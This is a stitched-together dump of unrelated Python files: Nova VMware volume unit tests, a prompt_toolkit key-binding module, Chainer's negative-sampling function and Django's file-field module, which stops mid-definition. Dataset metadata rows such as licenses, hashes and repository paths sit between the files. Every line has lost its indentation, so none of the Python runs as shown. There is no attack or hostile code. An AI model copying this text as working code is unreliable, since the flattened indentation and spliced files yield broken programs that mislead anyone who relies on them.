get_rdm_disk.return_value = device
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self._volumeops._detach_volume_iscsi(connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
detach_disk_from_vm.assert_called_once_with(
vm_ref, instance, device, destroy_disk=True)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
def test_detach_volume_iscsi_with_missing_iscsi_target(
self, iscsi_get_target, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
iscsi_get_target.return_value = (None, None)
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.StorageError, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi_with_missing_disk_device(
self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
get_rdm_disk.return_value = None
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.DiskNotFound, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
self.assertFalse(detach_disk_from_vm.called)
def _test_attach_volume_vmdk(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_VMDK,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
volume_device = mock.MagicMock()
volume_device.backing.fileName = 'fake-path'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
disk_type = constants.DEFAULT_DISK_TYPE
disk_uuid = 'e97f357b-331e-4ad1-b726-89be048fb811'
backing = mock.Mock(uuid=disk_uuid)
device = mock.Mock(backing=backing)
vmdk_info = vm_util.VmdkInfo('fake-path', default_adapter_type,
disk_type, 1024,
device)
adapter_type = adapter_type or default_adapter_type
if adapter_type == constants.ADAPTER_TYPE_IDE:
vm_state = power_state.SHUTDOWN
else:
vm_state = power_state.RUNNING
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, 'attach_disk_to_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
mock.patch.object(vm_util, 'get_vm_state',
return_value=vm_state)
) as (get_vm_ref, get_volume_ref, get_vmdk_info, attach_disk_to_vm,
update_volume_details, get_vm_state):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
attach_disk_to_vm.assert_called_once_with(
vm_ref, self._instance, adapter_type,
constants.DISK_TYPE_PREALLOCATED, vmdk_path='fake-path')
update_volume_details.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'], disk_uuid)
if adapter_type == constants.ADAPTER_TYPE_IDE:
get_vm_state.assert_called_once_with(self._volumeops._session,
self._instance)
else:
self.assertFalse(get_vm_state.called)
def _test_attach_volume_iscsi(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_ISCSI,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
adapter_type = adapter_type or default_adapter_type
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_discover_target',
return_value=(mock.sentinel.device_name,
mock.sentinel.uuid)),
mock.patch.object(vm_util, 'get_scsi_adapter_type',
return_value=adapter_type),
mock.patch.object(self._volumeops, 'attach_disk_to_vm')
) as (get_vm_ref, iscsi_discover_target, get_scsi_adapter_type,
attach_disk_to_vm):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
iscsi_discover_target.assert_called_once_with(
connection_info['data'])
if adapter_type is None:
self.assertTrue(get_scsi_adapter_type.called)
attach_disk_to_vm.assert_called_once_with(vm_ref,
self._instance, adapter_type, 'rdmp',
device_name=mock.sentinel.device_name)
def test_attach_volume_vmdk(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_IDE,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_vmdk(adapter_type)
def test_attach_volume_iscsi(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_iscsi(adapter_type)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
def test_consolidate_vmdk_volume_with_no_relocate(
self, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
device = mock.Mock(backing=backing)
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
self._volumeops._consolidate_vmdk_volume(self._instance, vm_ref,
device, volume_ref)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
self.assertFalse(relocate_vm.called)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_relocate(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
detach_disk_from_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException]
instance = self._instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_vm.assert_called_once_with(self._session,
volume_ref, rp, datastore, host)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device, destroy_disk=True)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_missing_vmdk(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
relocate_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException, None]
instance = mock.sentinel.instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_calls = [mock.call(self._session, volume_ref, rp, datastore,
host),
mock.call(self._session, volume_ref, rp, datastore,
host)]
self.assertEqual(relocate_calls, relocate_vm.call_args_list)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
def test_iscsi_get_host_iqn(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm, fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_iscsi_get_host_iqn_instance_not_found(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
side_effect=exception.InstanceNotFound('fake')),
mock.patch.object(vm_util, 'get_host_ref',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm,
fake_get_host_ref,
fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_get_host_ref.assert_called_once_with(
self._volumeops._session, self._volumeops._cluster)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_get_volume_connector(self):
vm_id = 'fake-vm'
vm_ref = mock.MagicMock(value=vm_id)
iqn = 'iscsi-name'
host_ip = 'testhostname'
self.flags(host_ip=host_ip, group='vmware')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_get_host_iqn',
return_value=iqn)
) as (fake_get_vm_ref, fake_iscsi_get_host_iqn):
connector = self._volumeops.get_volume_connector(self._instance)
fake_get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
fake_iscsi_get_host_iqn.assert_called_once_with(self._instance)
self.assertEqual(host_ip, connector['ip'])
self.assertEqual(host_ip, connector['host'])
self.assertEqual(iqn, connector['initiator'])
self.assertEqual(vm_id, connector['instance'])
| apache-2.0 | -7,208,667,700,467,265,000 | 47.405248 | 79 | 0.575559 | false |
m4yers/crutch | crutch/core/repl/keys.py | 1 | 2604 | # -*- coding: utf-8 -*-
# Copyright © 2017 Artyom Goncharov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
from __future__ import print_function
from prompt_toolkit.key_binding.manager import KeyBindingManager
from prompt_toolkit.keys import Keys
def get_key_manager(set_long_options, get_long_options): #pragma: no cover
assert callable(set_long_options)
assert callable(get_long_options)
manager = KeyBindingManager(
enable_search=True,
enable_system_bindings=True,
enable_abort_and_exit_bindings=True)
@manager.registry.add_binding(Keys.F2)
def opt_help(event):
"""
When F2 has been pressed, fill in the "help" command.
"""
event.cli.current_buffer.insert_text("help")
@manager.registry.add_binding(Keys.F3)
def opt_set_options_length(_):
"""
Enable/Disable long option name suggestion.
"""
set_long_options(not get_long_options())
@manager.registry.add_binding(Keys.F10)
def opt_exit(_):
"""
When F10 has been pressed, quit.
"""
# Unused parameters for linter.
raise EOFError
@manager.registry.add_binding(Keys.ControlSpace)
def opt_auto_complete(event):
"""
Initialize autocompletion at cursor. If the autocompletion menu is not
showing, display it with the appropriate completions for the context. If
the menu is showing, select the next completion.
"""
buf = event.cli.current_buffer
if buf.complete_state:
buf.complete_next()
else:
event.cli.start_completion(select_first=False)
return manager
| mit | 6,192,369,523,596,733,000 | 34.175676 | 78 | 0.730695 | false |
umitanuki/chainer | chainer/functions/negative_sampling.py | 4 | 6735 | import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
from chainer.utils import walker_alias
class NegativeSampling(function.Function):
"""Implementation of negative sampling.
    In natural language processing, especially language modeling, the
    vocabulary size is very large.
    Therefore, you need to spend a lot of time calculating the gradient of
    the embedding matrix.
    With the negative sampling trick, you instead only need to calculate the
    gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \log\sigma(x^\\top w_p) + \\
k E_{i \sim P(i)}[\log\sigma(- x^\\top w_i)],
where :math:`\sigma(\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
    It is approximated with :math:`k` examples :math:`N` sampled from the
    distribution :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \log\sigma(x^\\top w_p) + \\
\sum_{n \in N} \log\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
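
    A minimal usage sketch (illustrative only; ``word_counts``, ``x`` and
    ``t`` are hypothetical, with ``x`` a float32 mini-batch of hidden vectors
    of shape ``(batchsize, in_size)`` and ``t`` the positive word ids)::

        func = NegativeSampling(in_size=100, counts=word_counts, sample_size=5)
        loss = func(x, t)  # scalar loss summed over the mini-batch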
Args:
in_size (int): Dimension of input vectors.
counts (int list): Number of each identifiers.
sample_size (int): Number of negative samples.
power (float): Power factor :math:`\\alpha`.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
"""
parameter_names = ('W',)
gradient_names = ('gW',)
def __init__(self, in_size, counts, sample_size, power=0.75):
self.sample_size = sample_size
p = numpy.array(counts, numpy.float32)
p = numpy.power(p, p.dtype.type(power))
self.sampler = walker_alias.WalkerAlias(p)
vocab_size = len(counts)
self.W = numpy.zeros((vocab_size, in_size)).astype(numpy.float32)
self.gW = numpy.zeros_like(self.W)
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler.sample((size, self.sample_size + 1))
if isinstance(samples, numpy.ndarray):
samples.T[0] = t
else:
cuda.elementwise(
'T t, int32 m', 'raw T s', 's[i * m] = t;',
'negative_sampling_assign'
)(t, self.sample_size + 1, samples)
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, t_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0]
)
def to_gpu(self, device=None):
super(NegativeSampling, self).to_gpu(device)
self.sampler.to_gpu()
def to_cpu(self):
super(NegativeSampling, self).to_cpu()
self.sampler.to_cpu()
def forward_cpu(self, inputs):
x, t = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
f += x[(i / m) * c + j] * W[k * c + j];
}
wx = f;
''',
'negative_sampling_wx'
)(self.W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
} else {
loss = f + __logf(1 + __expf(-f));
}
y = loss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t = inputs
gloss, = grads
gx = numpy.zeros_like(x)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
self.gW[ik] += ig * ix
return gx, None
def backward_gpu(self, inputs, grads):
x, t = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cuda.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, self.W, self.samples, n_in, self.sample_size + 1, gx)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, self.gW)
return gx, None
| mit | -330,435,326,638,246,140 | 30.325581 | 79 | 0.493244 | false |
alexallah/django | django/db/models/fields/files.py | 11 | 18028 | import datetime
import posixpath
from django import forms
from django.core import checks
from django.core.files.base import File
from django.core.files.images import ImageFile
from django.core.files.storage import default_storage
from django.core.validators import validate_image_file_extension
from django.db.models import signals
from django.db.models.fields import Field
from django.utils.translation import gettext_lazy as _
class FieldFile(File):
def __init__(self, instance, field, name):
super().__init__(None, name)
self.instance = instance
self.field = field
self.storage = field.storage
self._committed = True
def __eq__(self, other):
# Older code may be expecting FileField values to be simple strings.
        # By overriding the == operator, it can remain backwards compatible.
if hasattr(other, 'name'):
return self.name == other.name
return self.name == other
def __hash__(self):
return hash(self.name)
# The standard File contains most of the necessary properties, but
# FieldFiles can be instantiated without a name, so that needs to
# be checked for here.
def _require_file(self):
if not self:
raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)
def _get_file(self):
self._require_file()
if not hasattr(self, '_file') or self._file is None:
self._file = self.storage.open(self.name, 'rb')
return self._file
def _set_file(self, file):
self._file = file
def _del_file(self):
del self._file
file = property(_get_file, _set_file, _del_file)
@property
def path(self):
self._require_file()
return self.storage.path(self.name)
@property
def url(self):
self._require_file()
return self.storage.url(self.name)
@property
def size(self):
self._require_file()
if not self._committed:
return self.file.size
return self.storage.size(self.name)
def open(self, mode='rb'):
self._require_file()
if hasattr(self, '_file') and self._file is not None:
self.file.open(mode)
else:
self.file = self.storage.open(self.name, mode)
return self
# open() doesn't alter the file's contents, but it does reset the pointer
open.alters_data = True
# In addition to the standard File API, FieldFiles have extra methods
# to further manipulate the underlying file, as well as update the
# associated model instance.
def save(self, name, content, save=True):
name = self.field.generate_filename(self.instance, name)
self.name = self.storage.save(name, content, max_length=self.field.max_length)
setattr(self.instance, self.field.name, self.name)
self._committed = True
# Save the object because it has changed, unless save is False
if save:
self.instance.save()
save.alters_data = True
def delete(self, save=True):
if not self:
return
# Only close the file if it's already open, which we know by the
# presence of self._file
if hasattr(self, '_file'):
self.close()
del self.file
self.storage.delete(self.name)
self.name = None
setattr(self.instance, self.field.name, self.name)
self._committed = False
if save:
self.instance.save()
delete.alters_data = True
@property
def closed(self):
file = getattr(self, '_file', None)
return file is None or file.closed
def close(self):
file = getattr(self, '_file', None)
if file is not None:
file.close()
def __getstate__(self):
# FieldFile needs access to its associated model field and an instance
# it's attached to in order to work properly, but the only necessary
# data to be pickled is the file's name itself. Everything else will
# be restored later, by FileDescriptor below.
return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileDescriptor:
"""
The descriptor for the file attribute on the model instance. Return a
FieldFile when accessed so you can write code like::
>>> from myapp.models import MyModel
>>> instance = MyModel.objects.get(pk=1)
>>> instance.file.size
Assign a file object on assignment so you can do::
>>> with open('/path/to/hello.world', 'r') as f:
... instance.file = File(f)
"""
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
# This is slightly complicated, so worth an explanation.
        # `instance.file` needs to ultimately return some instance of `File`,
# probably a subclass. Additionally, this returned object needs to have
# the FieldFile API so that users can easily do things like
# instance.file.path and have that delegated to the file storage engine.
# Easy enough if we're strict about assignment in __set__, but if you
# peek below you can see that we're not. So depending on the current
# value of the field we have to dynamically construct some sort of
# "thing" to return.
# The instance dict contains whatever was originally assigned
# in __set__.
if self.field.name in instance.__dict__:
file = instance.__dict__[self.field.name]
else:
instance.refresh_from_db(fields=[self.field.name])
file = getattr(instance, self.field.name)
# If this value is a string (instance.file = "path/to/file") or None
# then we simply wrap it with the appropriate attribute class according
# to the file field. [This is FieldFile for FileFields and
# ImageFieldFile for ImageFields; it's also conceivable that user
# subclasses might also want to subclass the attribute class]. This
# object understands how to convert a path to a file, and also how to
# handle None.
if isinstance(file, str) or file is None:
attr = self.field.attr_class(instance, self.field, file)
instance.__dict__[self.field.name] = attr
# Other types of files may be assigned as well, but they need to have
# the FieldFile interface added to them. Thus, we wrap any other type of
# File inside a FieldFile (well, the field's attr_class, which is
# usually FieldFile).
elif isinstance(file, File) and not isinstance(file, FieldFile):
file_copy = self.field.attr_class(instance, self.field, file.name)
file_copy.file = file
file_copy._committed = False
instance.__dict__[self.field.name] = file_copy
# Finally, because of the (some would say boneheaded) way pickle works,
# the underlying FieldFile might not actually itself have an associated
# file. So we need to reset the details of the FieldFile in those cases.
elif isinstance(file, FieldFile) and not hasattr(file, 'field'):
file.instance = instance
file.field = self.field
file.storage = self.field.storage
# Make sure that the instance is correct.
elif isinstance(file, FieldFile) and instance is not file.instance:
file.instance = instance
# That was fun, wasn't it?
return instance.__dict__[self.field.name]
def __set__(self, instance, value):
instance.__dict__[self.field.name] = value
class FileField(Field):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = FieldFile
# The descriptor to use for accessing the attribute off of the class.
descriptor_class = FileDescriptor
description = _("File")
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
self._primary_key_set_explicitly = 'primary_key' in kwargs
self.storage = storage or default_storage
self.upload_to = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_primary_key())
errors.extend(self._check_upload_to())
return errors
def _check_primary_key(self):
if self._primary_key_set_explicitly:
return [
checks.Error(
"'primary_key' is not a valid argument for a %s." % self.__class__.__name__,
obj=self,
id='fields.E201',
)
]
else:
return []
def _check_upload_to(self):
if isinstance(self.upload_to, str) and self.upload_to.startswith('/'):
return [
checks.Error(
"%s's 'upload_to' argument must be a relative path, not an "
"absolute path." % self.__class__.__name__,
obj=self,
id='fields.E202',
hint='Remove the leading slash.',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if kwargs.get("max_length") == 100:
del kwargs["max_length"]
kwargs['upload_to'] = self.upload_to
if self.storage is not default_storage:
kwargs['storage'] = self.storage
return name, path, args, kwargs
def get_internal_type(self):
return "FileField"
def get_prep_value(self, value):
value = super().get_prep_value(value)
# Need to convert File objects provided via a form to string for database insertion
if value is None:
return None
return str(value)
def pre_save(self, model_instance, add):
file = super().pre_save(model_instance, add)
if file and not file._committed:
# Commit the file to storage prior to saving the model
file.save(file.name, file.file, save=False)
return file
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
setattr(cls, self.name, self.descriptor_class(self))
def generate_filename(self, instance, filename):
"""
Apply (if callable) or prepend (if a string) upload_to to the filename,
then delegate further processing of the name to the storage backend.
Until the storage layer, all file paths are expected to be Unix style
(with forward slashes).
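
        For example (illustrative values only), ``upload_to='avatars/%Y'`` and
        a filename of ``'me.png'`` would produce a name like
        ``'avatars/2017/me.png'`` before the storage backend processes it
        further.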
"""
if callable(self.upload_to):
filename = self.upload_to(instance, filename)
else:
dirname = datetime.datetime.now().strftime(self.upload_to)
filename = posixpath.join(dirname, filename)
return self.storage.generate_filename(filename)
def save_form_data(self, instance, data):
# Important: None means "no change", other false value means "clear"
# This subtle distinction (rather than a more explicit marker) is
# needed because we need to consume values that are also sane for a
# regular (non Model-) Form to find in its cleaned_data dictionary.
if data is not None:
# This value will be converted to str and stored in the
# database, so leaving False as-is is not acceptable.
if not data:
data = ''
setattr(instance, self.name, data)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FileField, 'max_length': self.max_length}
defaults.update(kwargs)
return super().formfield(**defaults)
class ImageFileDescriptor(FileDescriptor):
"""
Just like the FileDescriptor, but for ImageFields. The only difference is
assigning the width/height to the width_field/height_field, if appropriate.
"""
def __set__(self, instance, value):
previous_file = instance.__dict__.get(self.field.name)
super().__set__(instance, value)
# To prevent recalculating image dimensions when we are instantiating
# an object from the database (bug #11084), only update dimensions if
# the field had a value before this assignment. Since the default
# value for FileField subclasses is an instance of field.attr_class,
# previous_file will only be None when we are called from
# Model.__init__(). The ImageField.update_dimension_fields method
# hooked up to the post_init signal handles the Model.__init__() cases.
# Assignment happening outside of Model.__init__() will trigger the
# update right here.
if previous_file is not None:
self.field.update_dimension_fields(instance, force=True)
class ImageFieldFile(ImageFile, FieldFile):
def delete(self, save=True):
# Clear the image dimensions cache
if hasattr(self, '_dimensions_cache'):
del self._dimensions_cache
super().delete(save)
class ImageField(FileField):
default_validators = [validate_image_file_extension]
attr_class = ImageFieldFile
descriptor_class = ImageFileDescriptor
description = _("Image")
def __init__(self, verbose_name=None, name=None, width_field=None, height_field=None, **kwargs):
self.width_field, self.height_field = width_field, height_field
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_image_library_installed())
return errors
def _check_image_library_installed(self):
try:
from PIL import Image # NOQA
except ImportError:
return [
checks.Error(
'Cannot use ImageField because Pillow is not installed.',
hint=('Get Pillow at https://pypi.python.org/pypi/Pillow '
'or run command "pip install Pillow".'),
obj=self,
id='fields.E210',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.width_field:
kwargs['width_field'] = self.width_field
if self.height_field:
kwargs['height_field'] = self.height_field
return name, path, args, kwargs
def contribute_to_class(self, cls, name, **kwargs):
